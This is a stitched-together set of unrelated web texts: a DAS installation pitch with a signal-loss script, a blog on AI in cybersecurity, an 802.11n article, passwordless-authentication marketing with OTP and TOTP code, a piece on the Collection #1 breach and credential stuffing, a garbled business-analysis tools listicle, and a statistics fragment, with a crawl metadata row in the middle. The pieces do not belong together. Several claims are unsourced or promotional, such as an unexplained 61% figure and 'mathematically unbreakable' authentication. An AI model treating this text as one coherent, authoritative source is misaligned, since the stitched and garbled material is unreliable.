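COAX_LOSS_DB_PER_30M = 2.0     # assumed coax loss per 30 m at cellular bands
SPLITTER_LOSS_DB = {2: 3.5, 3: 5.5, 4: 7.0}   # assumed insertion loss per split

def power_at_antenna(cable_run_m: float, splits: list[int]) -> float:
    loss = (cable_run_m / 30.0) * COAX_LOSS_DB_PER_30M
    loss += sum(SPLITTER_LOSS_DB[s] for s in splits)
    return BDA_OUTPUT_DBM - loss

# e.g. 90 m of coax through a 2-way and then a 4-way splitter
print(f"~{power_at_antenna(90, [2, 4]):.1f} dBm at the antenna")
```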
Another option is the active DAS system. This system uses BDAs that are donor fed to send the signal into equipment that converts the RF so it can be distributed to the server antennas. Each carrier is going to need a separate BDA and the signal is refined with taps and splitters. This system works well in buildings that are denser or are made mainly of brick and concrete. If the passive system isn’t strong enough, the active system is the right choice, but it is also the most expensive choice.
The hybrid DAS system combines features of both the active and passive systems. The features that you choose will be based on the type of building you are dealing with and how strong the signal is. The hybrid system will typically use coaxial BDAs that daisy chain to different IDFs.
When you consult with Decypher Technologies' DAS installation experts, you will get advice on how to move forward with your DAS system. You will want to choose a system that meets your needs and that is also within your budget. We, at Decyphertech, will guide you through the process so you get just what you need.
The term "Artificial Intelligence" was coined with the ultimate goal of creating technology more intelligent than humans. Since then, AI research has experienced many ups and downs. But ever since the rise of machine learning, and especially deep learning, AI seems to be gaining momentum, with a new success story almost every day.
Today, AI is leading the way in changing life on Earth for the better. AI is capable of performing tasks that once seemed impossible and that are out of reach for humans. There have been significant breakthroughs in the field of machine learning, and all these advances have allowed machines to analyze information themselves and perform in a sophisticated manner. In many tasks, this means AI systems are outperforming humans.
This post is my personal opinion regarding how AI has outperformed humans, followed by how AI is helping in cybersecurity. So, let’s find out more about it.
How has AI outwitted humans?
In today's technologically advanced world, we often see a variety of tasks that AI systems do much better than human beings. Humans do not have unlimited abilities and skills. We are capable of certain things, but as shown by AI systems like AlphaGo and Watson, machines can outwit humans at many individual tasks, no matter how challenging those tasks appear at first.
There are natural limits to the productivity of the human brain. A person can certainly turn to experts for help in assessing the potential of investing in a startup, but what if we need to examine several thousand companies rather than a single one?
No single expert, and not even a group of experts, could efficiently process such a significant volume of information. The use of AI, however, makes such problems tractable. For instance, Squilla Capital uses Artificial Intelligence along with Big Data to analyze more than eight thousand startups using metrics such as web and social media analytics, blockchain trading data, and others.
Human beings excel at using their experience, imagination, and judgment to put better security strategies in place and improve the overall security posture. It means that if they are not being warned by alerts and incidents, they might suffer badly. Thanks to AI, which alerts them before time, they can get back to what they do best.
Moreover, systems that run on AI can unlock potential for natural language processing, which collects information automatically by gathering various articles, news reports, and studies on cyber threats. The collected information gives insight to cyber-attacks, glitches, and prevention techniques. In this way, the cybersecurity companies remain updated regarding the latest risks and timeframe as well as build responsive strategies to keep the organization protected, which is quite challenging for humans to do so alone.
It is also found that 61% of organizations can detect breach attempts only with the use of AI technologies. Hence, it proves that AI is overtaking humans both in the fields of cybersecurity and data protection.
How is AI helping in cybersecurity?
Well! To a great extent, AI systems are outperforming humans, but there are certain limitations and drawbacks, too, which will be discussed later in this article.
AI is naturally suited to analyzing massive amounts of data and is possibly the only practical way to process big data in a given period. AI is capable of performing tasks without supervision, which significantly improves analysis efficiency. These characteristics enable AI to outperform humans at this kind of work.
AI is also capable of surveilling, identifying, monitoring, and tracking individuals across various devices, whether they are at home, at work, or in a public location. This means that even if your personal and private data is anonymized after it becomes part of a large data set, an AI system can de-anonymize the data based on inferences from other devices. The system blurs the difference between personal and non-personal data and, in the security context, helps ensure protection from cybercriminals.
Furthermore, many cybersecurity firms are training AI systems to identify malware and viruses with the help of sophisticated algorithms, so AI can run pattern recognition across software. AI systems can also detect the subtle early behaviors of a ransomware attack before it takes hold of the system and then isolate it from that system. This shows how AI systems are overtaking humans and helping with the data protection of various firms too.
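Behavioral detection of this kind often boils down to anomaly detection over activity features. The sketch below, which assumes scikit-learn is available, runs an Isolation Forest over invented per-host features (bytes sent, connection count, distinct destination ports); it illustrates the approach, not any vendor's actual detection logic.

```python
import numpy as np
from sklearn.ensemble import IsolationForest

# Fit on a synthetic baseline of "normal" host behaviour.
rng = np.random.default_rng(0)
normal = rng.normal(loc=[5e6, 40, 6], scale=[1e6, 10, 2], size=(500, 3))
model = IsolationForest(contamination=0.01, random_state=0).fit(normal)

# Score today's observations: the second row simulates an exfiltration-like burst.
today = np.array([
    [5.2e6, 38, 5],
    [9.5e7, 400, 180],
])
for row, verdict in zip(today, model.predict(today)):
    label = "anomalous" if verdict == -1 else "normal"
    print(row, "->", label)
```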
For personal protection and privacy, AI is again outperforming humans but in a negative sense by increasing the privacy risks to individuals. The AI-driven consumer products and autonomous systems are continuously equipped with sensors which collect and generate a massive amount of data without the knowledge of their users.
AI methods are used to recognize people who want to remain anonymous. They generate sensitive information about people from non-personal data, with the aim of profiling people based on population-scale data, some of which influences individuals' lives.
Limitations of using AI
The benefits discussed above are just a fraction of the potential of how AI is helpful in the cybersecurity world and how it is outperforming human beings. However, there are some limitations, too, which are preventing AI from becoming a mainstream tool to be used in this field.
To build and maintain AI systems, organizations might need a massive amount of resources, which includes data, computing power, and memory.
Secondly, it is also a fact that hackers can also use AI to test their malware and enhance it to become AI-proof. AI-proof malware can be exceptionally destructive as they are capable of learning from the existing AI tools and create more advanced attacks that can penetrate AI-boosted systems.
Mentioned below are some strategies which every firm should adopt to overcome the AI limitations.
Hire cybersecurity professionals who have prior experience and skills in different areas of cybersecurity.
Employ a cybersecurity team for testing systems and networks for any possible gaps and fix them as soon as possible.
Install firewalls as well as other malware scanners to protect your systems and keep them updated to match the redesigned malware.
Monitor outgoing traffic and apply egress filters to restrict the types of traffic that can leave the network.
Use filters for URLs to block any malicious links which can have malware or a virus.
Digital technologies like AI have made significant contributions to many areas of our lives. The enormous quantities of information that we can now collect and analyze are all blessings of AI. But there are areas where AI is limited, and there humans remain the only possible solution. Therefore, it is fair to say that AI has outperformed humans not entirely, but to a great extent.
Five Things You Need To Know About 802.11n
Five facts to help you navigate through the new standard.
By Joe Epstein
People often say that wireless networking will someday replace the hard wires that connect people to the network, but for years the technology supporting wireless LANs wasn’t considered sufficiently powerful. Instead, WLANs were perceived as a good supplement to wires, providing mobility and convenience for employees, but with the understanding that users would plug back in to Ethernet as their primary connection. WLANs were simply too slow, too hard to deploy, and too sensitive to the number of users to really be relied on.
With the recently ratified wireless networking standard, dubbed 802.11n, there are new opportunities to change that belief. The latest generation of wireless technology that underlies Wi-Fi was ratified in September, opening up opportunities for wireless networking. Networks based on this new technology can run as much as seven times faster than the previous generation of wireless could -- to over 200Mbps. Along with this greater speed come features that make wireless an attractive option.
If you are building out a new network, or have an existing one, and want to understand what 802.11n means to your environment and users, the five points below highlight the basic, key points that will help you navigate through this new standard.
1. 802.11n can outperform many existing wired networks
802.11n applies a number of new techniques to wireless networking to reach bit rates of 300Mbps -- translating to over 200Mbps of real TCP data after taking overhead into account. Many wireline data networks to the desk are based only on "Fast Ethernet," or 100BASE-T, providing less than 100Mbps of real data throughput. That gives wireless networks the potential to go twice as fast as wired networks, for the first time ever. Future versions of 802.11n will go even faster, and soon we may see up to 600Mbps for peak bit rates.
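Those headline figures fall straight out of the 802.11n PHY parameters. The quick sanity check below uses the 40 MHz channel, 64-QAM rate-5/6 modulation, and short guard interval defined by the standard; treat it as an illustration of where the numbers come from, not a throughput predictor.

```python
def phy_rate_mbps(streams: int,
                  data_subcarriers: int = 108,   # 40 MHz channel
                  bits_per_subcarrier: int = 6,  # 64-QAM
                  coding_rate: float = 5 / 6,
                  symbol_time_us: float = 3.6) -> float:  # short guard interval
    """Peak PHY rate = coded bits per OFDM symbol divided by symbol duration."""
    bits_per_symbol = data_subcarriers * bits_per_subcarrier * coding_rate * streams
    return bits_per_symbol / symbol_time_us  # Mbit/s

print(phy_rate_mbps(streams=2))   # 300.0 -> the 300Mbps cited in the article
print(phy_rate_mbps(streams=4))   # 600.0 -> the future 600Mbps peak
```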
Of course, the clients have to share the throughput of one 802.11n access point. Some 802.11n network vendors allow the layering of channels in one area, allowing a peak throughput of over ten times that amount in a single spot and exceeding a gigabit of aggregate throughput to split across the users -- more than enough for most networks in the foreseeable future.
2. 802.11n can run your wireline applications at a lower cost
With the higher throughput, it is now possible to move conventional, wired-only applications onto wireless. Medical applications, financial applications, warehouse inventory and shop floor management software, point-of-sale systems, and applications that were too business-critical for legacy, low-throughput WLANs are now being deployed on top of 802.11n.
The idea of a school doing all of its teaching and testing online may not be new, but to have all students connected online in the classroom is, and 802.11n makes it possible.
New applications are also being created just for wireless to take advantage of the blend of capacity and mobility that 802.11n provides. Hospitals are migrating chart and prescription applications to wireless and have started deploying “robo-docs” -- robots with a camera and a screen that can do rounds and visit patients with the actual doctor seated a thousand miles away.
There will still be wired ports for some time to come, but their role will change as wireless begins to share the title of primary network. The fact that wireless networks are less expensive to install -- far fewer cable pulls and ports -- is making sure of that.
3. 802.11n is not like its predecessors, 802.11a/b/g
Compared to previous 802.11a/b/g wireless networks, 802.11n marks a radical departure. It is faster and gets its higher speed in a unique way. This means that there is a learning curve that administrators of wireless networks must go through to understand what 802.11n can do and how it works.
The added speed is possible by using radio waves in a different way. Instead of relying on a straight path from the access point to the client (passing through walls as needed), 802.11n relies on signals that echo off of every surface. This concept, called multipath, means that 802.11n uses a different set of rules to predict when it will perform optimally and when it will have to back down to lower throughputs. For example, tough-to-cover spots in legacy networks can become some of the best spots for performance with 802.11n.
Multipath directly impacts the tools used to plan for, deploy, and manage a WLAN. New tools, based themselves on new techniques, have to be created. Prediction tools, such as RF planning systems and networks that use automatic RF configuration, are the hardest hit, because how well 802.11n will operate cannot be predicted; performance depends on how signals bounce off surfaces. New tools and systems are emerging that can solve the problem a different way, providing predictability by replacing old methods (such as dynamic transmit power control and dynamic channel selection) with robust methods specifically for 802.11n.
4. Device diversity is much higher in wireless than wires, however, so keep your eyes open
The actual technology used in 802.11n is more advanced than that in Ethernet. The greater power each client has provides a greater set of options and places for behaviors to differ. Therefore, the diversity in client capabilities is much greater in wireless than it was for wired connections. Most Ethernet ports can be thought of as essentially the same -- the only important question is whether it is 10Mbps, 100Mbps, or gigabit -- but 802.11n devices support a far greater number of features and can do so quite differently.
The good news is that nearly every client is certified to be interoperable by the Wi-Fi Alliance, an industry organization dedicated to this cause. In fact, they have been certifying for over two years now, first based on an earlier version of the technology but now using the ratified standard. This has ensured that all of the 802.11n devices work together.
Optimal performance still depends on the feature set of each device and how the device makes use of these features, which, in turn, depends on the particular model of wireless adapter and driver version. For example, in the two years that 802.11n-compatible devices have been commercially available, Intel has sold three different types of Centrino 802.11n adapters: the 4965, the 5100, and the 5300. Each one supports a different peak data rate and a similar, but still substantially differing, set of features. The same holds for other manufacturers.
There is a solution to this, embodied in the last thing you need to know about 802.11n.
5. It is now possible to build a switch-like network with 802.11n
Previously, wireless LANs were a free-for-all, where every device could do what it wanted -- within boundaries -- with the network unable to prevent such activity because legacy wireless was purely hub-based. Wireline Ethernet solved its own free-for-all problem, launching edge networking into the mainstream with the creation of a switch. Techniques have been added to 802.11n that now make it possible to build a switch-like wireless network.
Each wireless device can be segregated into its own wireless “port,” where its ability to affect the quality of the network for all of the other devices is nearly eliminated. Switch-like wireless allows the same methods of bringing the network under control for Ethernet to be used with 802.11n.
Currently, most wireless vendors still sell hub-based 802.11n, but switch-like 802.11n is now available, and it is important for those building wireless networks to seek out switch-like technology, and not just build a faster hub-based network.
The Last Word
Together, switch-like 802.11n, with its higher throughput, application-enabling mobility, and powerful client devices, can finally create a network that can replace Ethernet at the desks and in the halls.
Joe Epstein is the senior director of technology at Meru Networks. You can contact the author at email@example.com
Providing secure and easy-to-use authentication and login mechanisms should be one of the main goals every online service pursues.
Unfortunately, passwords, the traditional method to protect online accounts and keep intruders out, are becoming less reliable and more cumbersome to maintain, both for users and for service providers. The industry is in desperate need of a no-password option.
Where to go from here?
Fortunately, alternative, no-password login technologies exist that provide password-less identity verification, and can help solve some of the perennial problems that stem from the use of passwords.
Why are passwords insecure?
There are many reasons to assume that a decent password is no longer enough to protect a sensitive account. These days, a strong password is one that has a length of at least 10 characters and consists of letters, digits, and symbols. Moreover, it should not be shared with any other service and should be changed at least every three months.
It gets worse:
With users having dozens of email, messaging, social media, banking and other online accounts, memorizing and maintaining so many unique passwords becomes a burden. And every new account that a user creates adds to that burden.
That's why users often neglect those requirements, choosing weak passwords, reusing passwords across accounts, and avoiding password changes, which makes them vulnerable to brute-force attacks, dictionary attacks, cross-service password breaches, and more.
From a service provider perspective, passwords require a company to store secrets and burden them with the task of protecting those secrets.
Even the biggest companies have a hard time protecting password databases against data breaches.
Moreover, as users often forget their passwords, companies are required to store password hints and provide password recovery mechanisms, which opens up a Pandora’s box of vulnerabilities and attack vectors.
What are no-password login technologies?
The goal of no-password login is to provide security that is on par with or superior to complex passwords, while at the same time being as simple to use as password authentication, or simpler.
Some promising alternatives:
Biometric authentication uses biological input to verify the identity of a user. The implementation of biometric authentication used to be a complicated and costly process, but has become more accessible thanks to advances in smartphone technology.
The most popular form of biometric authentication is fingerprint scanning, with other methods including retina scans and voice authentication.
One of the biggest hurdles to implementing biometric authentication is still the hardware requirements. Fingerprint scanners are only available on high-end, expensive devices that not all users can afford. This makes them less ideal for public applications that will be used by all kinds of users.
Also, there are many settings where biometric authentication can go wrong, which always makes it necessary to couple it with some other form of authentication.
One-time passwords (OTP)
A one-time password is an authentication mechanism that uses a non-persistent secret, usually a short passcode that is valid for one session. Upon every login attempt, a passcode is generated and sent to an associated phone number or email address, which the user has to enter on the login page in order to access the account.
The passcode is only valid for the duration of that one session. Any subsequent logins will require a new passcode.
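On the server side, the mechanism is small: generate a short random code, keep it only until it is used or expires, and accept it at most once. The sketch below is a minimal illustration (the in-memory store and the fixed five-minute lifetime are assumptions); delivering the code over SMS, email, or push is left out.

```python
import secrets
import time

CODE_TTL_SECONDS = 300
_pending = {}   # username -> (code, expiry); a real service would use a datastore

def issue_otp(username: str) -> str:
    """Create a six-digit code and remember it until it is used or expires."""
    code = f"{secrets.randbelow(10**6):06d}"
    _pending[username] = (code, time.time() + CODE_TTL_SECONDS)
    return code   # hand off to the SMS/email/push delivery channel

def verify_otp(username: str, submitted: str) -> bool:
    """Single use: the stored code is removed whether or not the check succeeds."""
    code, expiry = _pending.pop(username, (None, 0))
    return code is not None and time.time() < expiry and secrets.compare_digest(code, submitted)
```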
OTPs have the benefit that they do not require the service provider to store permanent passwords on its servers, making them considerably safer than normal passwords.
However, an insecure implementation can open up its own set of vulnerabilities. For instance, sending OTPs through SMS is no longer considered secure, due to the risk of the channel through which the message is delivered becoming compromised.
The complexity of the process, compared with simply entering a password, is one of the factors that has resulted in OTPs not being very popular among users, leading to their adoption as a secondary authentication mechanism rather than the main way to verify user identity.
Authenticator apps use a mobile application to verify user identity. When signing up with a service, users install the authenticator app on their mobile device and associate it with their account.
When users attempt to access their account, instead of prompting for a password, the service sends an access request to the associated device through the authenticator app. After the user approves the app request, access to the account is granted.
Authenticator apps are rising in popularity because of their added security, frictionless experience and the fact that mobile devices are becoming ubiquitous. Google and Microsoft provide authenticator apps for their own services as well as an extension that you can add to your own website.
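Many authenticator apps, Google Authenticator among them, implement time-based one-time passwords (TOTP, RFC 6238) rather than, or alongside, push approval: a shared secret is provisioned once (usually via QR code), and the app and the server independently derive the same short-lived code. A minimal generator looks roughly like this (the base32 secret is a made-up example):

```python
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32: str, period: int = 30, digits: int = 6) -> str:
    """RFC 6238 time-based one-time password using HMAC-SHA1."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = struct.pack(">Q", int(time.time()) // period)   # 30-second time step
    digest = hmac.new(key, counter, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                                 # dynamic truncation
    value = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(value % 10**digits).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))   # the service computes the same value to verify
```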
The Double Octopus authentication solution provides the ease of use attributed to authenticator apps and uses the secret-sharing mechanism to eliminate the vulnerabilities that other solutions suffer from.
Find out more about Double Octopus authentication solution here.
In today’s digital threat landscape, large-scale information compromise is no longer big news.
Averaging one a month, hackers have consistently managed to execute major breaches against organizations the world over, resulting in millions of compromised identities.
But the sheer scale of the most recent mega breach makes it something unique.
Dubbed Collection #1 by its discoverer Troy Hunt, the breach amounts to nearly 773 million exposed usernames and passwords. The database was uploaded in a post to an unnamed dark web hacking forum. Hunt subsequently organized these files in a publicly viewable Pastebin file.
Hardly a Surprise
Needless to say, the industry was in awe over the size of this breach. The broader implication of Collection #1's discovery is that there are likely scores of other databases like it, credential troves that are being bought, sold, and traded every day on hacking forums.
But this massive collection of stolen credentials being uncovered should hardly surprise anyone. Credentials have long been the weak link in the security chain. For years, the overwhelming majority of hacks have been the result of stolen passwords. As long as identity security is dependent on a piece of information users need to safeguard, cybercriminals will find a way to obtain it.
Then of course there’s the human factor. Either by inadvertently exposing their passwords, or entering them via an insecure medium, users regularly put their credentials at risk. An organization that entrusts users to control their authentication details is inviting hackers.
An Accumulating Threat
When most businesses hear news of a breach, their first response is to assume that it affects the broader consumer market, not the organization.
Companies need to step out of this mindset of immunity.
Using a three-step process, hackers can use large compilations of credentials to maximize the amount of illicit access they can achieve, and wreak havoc on businesses.
Step 1) Credential Stuffing
Once cybercriminals have amassed a good amount of spilled usernames and passwords, they use a program called an account checker to test the stolen credentials against a multitude of websites, usually high-value sites such as social media platforms or online marketplaces. Statistically, 0.1 to 0.2 percent of total logins in a well-run stuffing campaign are successful. That may sound like a minuscule amount, but when running hundreds of thousands of credential sets against dozens or even hundreds of sites, those successes add up, and when dealing with a breach of over 700 million credentials, those numbers reach the hundreds of thousands.
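One practical defense against stuffing is to screen passwords against known-breach corpora at signup and password change. Troy Hunt's Pwned Passwords service exposes a k-anonymity range API for exactly this; the stdlib-only sketch below sends only the first five characters of the SHA-1 hash, never the password itself.

```python
import hashlib
from urllib.request import urlopen

def breach_count(password: str) -> int:
    """Return how many times the password appears in the Pwned Passwords corpus."""
    sha1 = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    prefix, suffix = sha1[:5], sha1[5:]
    with urlopen(f"https://api.pwnedpasswords.com/range/{prefix}") as resp:
        for line in resp.read().decode().splitlines():
            candidate, _, count = line.partition(":")
            if candidate == suffix:
                return int(count)
    return 0

# if breach_count(new_password) > 0: reject it at signup or password change
```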
Step 2) Corporate Account Takeover
Corporate account takeover is a type of business identity theft in which cyber thieves gain control of key company accounts, assuming their identities and privileges. These are typically accounts of senior officials that grant special privileges to manipulate company data and/or assets. Once hackers successfully gain access to such an account through a stuffing campaign, they can then assume the privileged identity in order to move through the organization unabated.
Step 3: Privilege Escalation
Once attackers have gained access to a corporate account, they look for a vulnerability, design flaw, or configuration oversight to gain elevated access to protected resources, from the user level up to the kernel level. This allows them to manipulate or steal data, and even make monetary transactions on the company's bill.
The revelation of Collection #1 is just the latest reminder on a hard truth of digital authentication: as long as there is a human factor, identities will be at risk.
The single most effective step to secure accounts and protect networks is to circumvent all the vulnerabilities associated with password-based authentication. Adopting a passwordless multi factor authentication (MFA) solution means no more risk of credentials being compromised by accidental exposure, and no more password theft via traditional methods such as phishing schemes.
But going passwordless offers more than security advantages. User experience for all account holders is increased exponentially, as users are no longer required to remember passwords, abide by complex password policies, or run the risk of being locked out when a password is lost or discarded.
The Octopus Approach
The Octopus Authenticator of Secret Double Octopus is the only passwordless solution offering seamless, mathematically unbreakable authentication.
Octopus Authenticator is fully scalable to any organization and can be integrated into all enterprise cases and tools. This means no service within the network is left to rely on user-controlled passwords.
To address the needs of today’s mobile and off-site workforce, the Authenticator allows for both offline and online access.
Octopus provides the very highest in authentication assurance while removing password related costs and the pains of memorized secrets.
Business analysis is the process of understanding business requirements. Business analysis tools help business analysts collaborate better, gather and organize information, document business requirements, perform use case analysis, and create models.
Do you know any of the tools of business analysis? If not, then just go through the blog to know about top business analysis tools used by the business analyst.
Through this blog, we will try to make you aware of the definition of business analysis, its importance, the difference between business analysis and business analytics, the top business analysis tools, the techniques of business analysis, and the differences between business analysis and business intelligence.
What is Business Analysis?
Business analysis is about understanding how your company works to serve its goals. It can be seen as a research discipline that helps you identify business needs and determine solutions to business problems.
These solutions may include the development of a software or system component, process improvements, organizational changes, or strategic planning and policy development. Thus, the purpose of business analysis is to identify solutions that address the need for improvement.
Business analysis offers ideas and insights into the development of the initial framework for any project. It provides a way to guide a project's stakeholders as they perform business modeling in a systematic manner. There are a lot of ways to describe the process and techniques of business analysis. However, there is one common definition.
A particular group of information, work, and procedures, which are necessary to know about the requirements of business and the solutions to its problems is called Business Analysis.
The process and techniques can be different in various industries. When talking about Business Analysis in an IT industry, it usually involves a system development component. Additionally, the changes in organization and betterment in processes are also taken into consideration.
(Related blog: What is a Business Analyst?)
Business Analysis can even tell about the current state of any organization. Also, needs and requirements can be identified. However, business analysis is usually performed to find solutions to the goals and objectives of the business.
Importance of Business Analysis
Business analysis is very important for any company for attaining economic stability in the market. The company strengthens its tactical and technological abilities by analyzing business. The reason behind this is to become familiar with the market strategy and even their stance in the market.
Hence, we can say that business analysis is a very powerful part of any business. It works for observing business, it’s desired, and infers the best remedy to the company problems. Also, it helps to enhance the cogency of IT through adequate alignment with the company to improve profitability.
Difference Between Business Analytics and Business Analysis
In the world of business, we often hear the word business analysis and business analytics, but have you ever thought about how they are different? If not, then keep reading to know the differences between business analysis and business analytics;
The architectural domains for business analysis are process architecture, enterprise architecture, and technology architecture whereas architectural domains for business analytics are data architecture, and information architecture.
What is the Difference between Business Analysis and Business Intelligence?
Have you ever thought about how business analysis and business intelligence are different? So, here you will find the answer to this question.
Business analysis has more expressive indicators than business intelligence. Since business intelligence depends on an assortment of information, it is typically centred around achieving a quick beneficial turn of events, while business analysis is a steady cycle.
Business analysts are continually investigating information procured by business intelligence units to sort out the most ideal alternatives for better activities in the future. Business Intelligence has some limitations whereas business analysis does not have that many limitations.
(Most related: Top Business Intelligence Tools and Techniques)
There are other differences also like business analysis is more crucial to decision making that business intelligence, business intelligence can run the business but business analysis changes the business.
Top 11 Business Analysis Tools
As today everything is incorporated with technology, no doubt a basic and proficient business analysis tool helps in playing out the business analysis errands all the more rapidly and effectively. Here, you will learn about some of the best business analysis tools.
Oracle NetSuite is one bound together business management suite. It includes functionalities for ERP, CRM, and so forth.
- SuiteAnalytics gives the tools of saved search that will channel and match information for responding to various business questions. It has answers for little to enormous size organizations.
- It gives standard and adjustable reports to all transaction types. It will let you make a Workbook without coding and encourages you with analyzing the information.
- Oracle NetSuite has functionalities to assist entire industries with their complicated practical, enterprise, and tax requirements.
Creatio is a low code stage with CRM and cycles automation functionalities.
- This low code stage will let IT just as non-IT individuals fabricate the applications as indicated by their particular business needs.
- It benefits on-premise just as in cloud deployment.
- This BPM device is best for medium to enormous organizations.
Do you know you can personalize the transmission with the customer through Service Creatio? If not then let’s make it clear, yes you can. Also, it has out-of-the-box explanations that will broaden outlet functionality.
Wrike is the real-time Work Management tool for the business analysis process that centrally deposits entire information for making the cost of overall project less.
- It gives the building block of the working ecosystem and a visual timeline to examine the project schedule and project reporting.
- By rendering the workload view feature, Wrike can be used for balancing resources and performance tracking. For example, it keeps records of the time consumed by any team member for planning and budget management.
- As a cloud-based project management software, it is a mobile-responsive platform that can be implemented to update any task form any anywhere, and for live editing and file management.
- It can help in setting and planning deadlines for project execution. Additionally, it gives a calendar function with the facility to communicate and confirm within the software.
Xplenty is a cloud-based information mix stage that will bring all your information sources together.
- It offers no-code and low-code alternatives that will make the stage to be usable by anybody.
- Its instinctive realistic interface will assist you with executing an ETL, ELT, or a replication arrangement.
- Xplenty offers answers for promoting, deals, client care, and engineers.
Xplenty's sales analytics explanation gives the characteristics to comprehend your clients, information enhancement, brought together information base, for keeping your CRM coordinated, and so forth.
Bizagi is the agile automation platform that offers three products to use on-premise, i.e Bizagi Modeler, Studio, and Automation. For instance, Bizagi Modeler is used for drawing diagrams that follow BPMN.
In order to draw business process models, it is essentially simple to use and most powerful, also it can generate enormous documentation in MS Word.
In the cloud, it provides as a service platform. Moreover, Bizagi offers business management tools and supports Word, PDF, Wiki and Share Point.
Top business analysis tools
HubSpot is inbound marketing, sales, and service software that is used to examine the performance of a site with essence metrics so that a user can learn about the quality and quantity of traffic generated.
Its Marketing Analytics Software can assist in computing the efficiency/conduct of overall advertising efforts at a single spot. Also, it has an in-built analysis feature and gives reports and dashboards.
In addition to that, for instance, the user can filter the analytics, say by country or any particular URL structure, even each of user marketing platform, the user would obtain reports in detail.
Microsoft Visio, a portion of the MS office, is the dominant tool for project management and business modelling. It can effectively be deployed to catch and present the idea of stakeholders in the particulars of business functions and user interactions.
In order to make advance diagrams and templates, it can be used to link data from several sources for representing information graphically.
Moreover, Microsoft Visio can be used to produce project flowcharts, use-case diagrams, process flowcharts, data models, architecture designs and diagrams, project schedules and sequence diagrams and activities, etc.
Lucidchart is a visual communication tool that is available online. It is a type of web-based explanation for charts and graphs. It can be used simply by taking its subscription.
With this tool, you can sketch simple as well as complicated flowcharts and diagrams, even more, you can forge a suitable connection among live data and diagrams.
For designing and making automated build org charts, Lucidcharts supports data importing, its cloud-based platform and intuitive user-interface make it easier to begin diagramming, even if you are using any device, browser or operating system.
Moreover, Lucidchart enhances the ecosystem of teamwork by providing co-authoring in real-time, in-editor chat, shape-specific comments, and collaborative cursors.
It can be blended with any most-used app such as G Suite, Atlassian, Microsoft Office, or Slack to start new diagrams or incorporate existing visuals where users communication already was taking place.
Blueprint is the tool that is mainly designed for agile planning, simply, it would scale organizational swiftness. More specifically, it can make customized lean documentation from artefacts, and aid in delivering products more quickly, and Blueprint can be integrated with JIRA.
Robotic process automation that is designed using manual documentation is likely to smash and demand maintenance, in cure if it, Blueprint provides a solution in the form of the Enterprise Automation Suite, a powerful process automation design platform, it has all the facilitated components to design and deliver excellent quality RPA implementations.
The Enterprise Automation Suite, from Blueprint, can give digital Blueprints that allow us to define, design, and delivering the right solutions, such solutions can make influential business values to our business.
InVision is a prototyping business tool that enables us to create interactive mock-ups swiftly and easily for our designs. Whenever designs are ready, they could be shared in the team, besides that, one can discuss mock-ups by leaving comments inside the app.
Through this tool, a user can make designs for his/her products and this can be used with a number of platforms like DropBox, Slack, Microsoft teams, BaseCamp, Confluence, Teamwork, and Trello.
InVision has the feature as;
InVision Cloud, for making designs for products,
InVision Studio, for designing the screen, and
InVision DSM (Design System Manager), changes in the design get sync, and a user can access the library from InVision Studio.
Many business projects appeal wireframing applications for representing the proposed project’s model (mock-ups) usually wireframing diverges on content, and user interaction.
This tool deploys brainstorming sessions and gives instant feedback from stakeholders. Moreover, Balsamiq models assist businesses to work faster and smoothly, enable to introduce projects online and work as collaboration support amid team and clients.
For example, if you want to create wireframes for your websites then you can use this tool as it gives a GUI for mock-up, gives an editor, and drag and drop facility.
Balsamiq gives ample user interface controls and icons and provides an abundant library for customized controls and build reusable constituent libraries and templates.
It depicts project models using pdf with inserted links and renders the swift and spontaneous user interface.
What are the Techniques of Business Analysis?
Here we will learn about the most important business analysis techniques.
SWOT- SWOT is the short form of Strength, Weakness, Opportunities, Threats. This will help you in finding areas of both strength and weakness. Also, it permits a reasonable allotment of resources.
(Also read: The SWOT analysis of Reliance Jio)
MOST- Mission, Objectives, Strategies is the full form of Most. It permits business analysts to perform through inside investigation of what is the point of an association to accomplish and how to handle such issues.
(Read our blog on MOST analysis)
PESTLE- Political, Economic, Sociological, Technological, Legal, and Environmental is the full form of PESTLE. This prototype assists business analysts to assess all the outside variables which can impress their association and decide how to deal with them.
Business analysis methods assist you to know the pattern and the dynamics of the corporation and also permits you to solve recent issues in the target association. So, after reading the blog you must have realized the importance and tools of business analysis.
There are plenty of tools for business analysis that help business analysts in doing their work easily, so a business analyst can't learn or use all such tools within the period of their work life.
"Business analysts must have a thick skin: thick enough to take feedback on documents and receive unexpected answers to questions!"- Laura Brandenburg
Business Analysis tools can be used for displaying by the analyst from arranging through to product support. The analysis tools can be used with any business analysis measure with a wide scope of highlights that permit experts to work using their preferred strategies.
The analyst will be cheerful in the knowledge that whatever the assignment is, there will consistently be an analysis tool to help them. | <urn:uuid:68e7b007-8866-4d0a-9776-1d54986f9cd7> | CC-MAIN-2022-40 | https://www.analyticssteps.com/blogs/11-top-business-analysis-tools | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00740.warc.gz | en | 0.921283 | 2,860 | 2.609375 | 3 |
In 8th class, Statistics used to be one of the easiest chapters of all in the mathematics section and that was actually the real purpose of it to combine different types of data and to present it in an adequate and neat way.
Nobody at that age and IQ level would understand the use of it but now in today’s world, it has become the norm to process data through statistics so that it becomes trouble-free for others to understand it and pick something valuable and informative out of it.
To put it in simple words, statistics is the basic use of mathematics in formulating a technical analysis of data. It is used to process complex problems in the real world so that data scientists and analysts can look for meaningful trends and changes in Data.
Different statistical techniques and functions, principles and algorithms work together to provide us with an ideal Statistical model.
If the data taken is a sample from a larger population, then the data scientist or the analyst is supposed to assume patterns and interpret them as data from the large population solely based on the results of the sample size that was taken earlier. This may seem like a scary yet bold step but you would be surprised by its accuracy.
Statistical analysis has proven to be an elite way to analyse and interpret data in various different fields such as the psychology, business, physical and social sciences, production and manufacturing, government, etc.
On the other side, Data Science is the perfect blend of business, mathematics, computer science and communication.
As Wikipedia search for Data Science reads, ”Data Science is a concept to unify statistics, data analysis, and their related methods in order to understand and analyse the actual phenomena with data.” It is using different algorithms, patterns from structured or unstructured data to form insights and gain knowledge about any field of play.
It is primarily used to make decisions and predictions making use of predictive casual analytics, prescriptive analytics (predictive plus decision science) and machine learning. However, all these analyses are described in another blog, i.e. types of statistical analysis.
